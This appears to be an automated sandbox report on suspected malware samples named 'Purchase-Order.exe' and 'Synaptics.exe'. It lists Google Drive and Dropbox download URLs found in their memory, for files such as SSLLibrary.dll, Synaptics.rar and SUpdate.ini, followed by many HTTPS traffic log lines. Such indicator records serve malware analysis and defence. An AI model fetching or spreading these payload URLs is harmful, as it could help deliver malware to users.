                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1C7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.00000000073C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx;u
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxQx
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxSU
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxmW
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady:
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyCkCx
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyQ
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyk
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyk;
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadykG
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyo
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyoP
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyoT
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor.
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor..
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor..Go
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyox
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzex
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                                Source: Purchase-Order.exe, 00000000.00000003.1704969935.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                                Source: Purchase-Order.exe, 00000000.00000003.1704969935.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                                Source: Purchase-Order.exe, 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000002.00000002.2956093270.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.userconten
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.goog
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?D
                                Source: Synaptics.exe, 00000002.00000002.3069143286.000000003AFA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0Bx
                                Source: Synaptics.exe, 00000002.00000002.3076603001.000000003B2BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVG
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3080529691.000000003B444000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1C7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.00000000005FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984057257.000000000E8B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3017903336.000000001D6FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3018933700.000000001D79B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.00000000005CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D635000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-CH-UA-
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5SM6
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5SMg
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI?
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKB
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeB
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyo
                                Source: Purchase-Order.exe, 00000000.00000003.1704969935.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                                Source: Purchase-Order.exe, 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000002.00000002.2956093270.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                                Source: Purchase-Order.exe, 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000002.00000002.2956093270.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                                Source: Purchase-Order.exe, 00000000.00000003.1704969935.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlH
                                Source: Purchase-Order.exe, 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000002.00000002.2956093270.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50498 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50502
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50501
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50504
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50503
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50578 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50506
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50505
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50508
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50507
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50486 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50325 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50509
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50513
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50512
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50515
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50514
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50516
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50519
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50511
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50544 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50439 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50524
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50523
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50526
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50525
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50528
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50529
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50507 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50520
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50522
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50521
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50566 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50556 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50522 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50313 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50534 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50496 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50474 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50578
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50339
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50338
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50546 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50571
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50570
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50331
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50573
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50572
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50575
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50332
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50466 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50574
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50576
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50348
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50349
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50505 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
